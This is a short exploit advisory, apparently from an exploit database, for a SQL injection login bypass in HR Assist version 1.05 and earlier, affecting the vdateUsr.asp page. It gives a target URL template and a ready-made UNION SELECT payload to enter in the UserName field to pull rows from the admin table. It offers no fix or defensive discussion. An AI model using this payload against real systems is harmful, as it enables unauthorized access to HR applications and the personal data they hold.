id: 1249
date: 12/09/2006
title: HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass Vulnerability
author: ajann
cves: 

==================================================================
HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass Vulnerability
==================================================================



*******************************************************************************
# Title   :  HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass SQL Injection
# Author  :  ajann
# Page    :  http://www.ezhrs.com
# Contact :   :(
# $$$     :  $45

*******************************************************************************
Example:

###http://[target]/[path]/

UserName: ' union select 0,0,0,0,0,0,0,0,0,0,0,0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-27]  #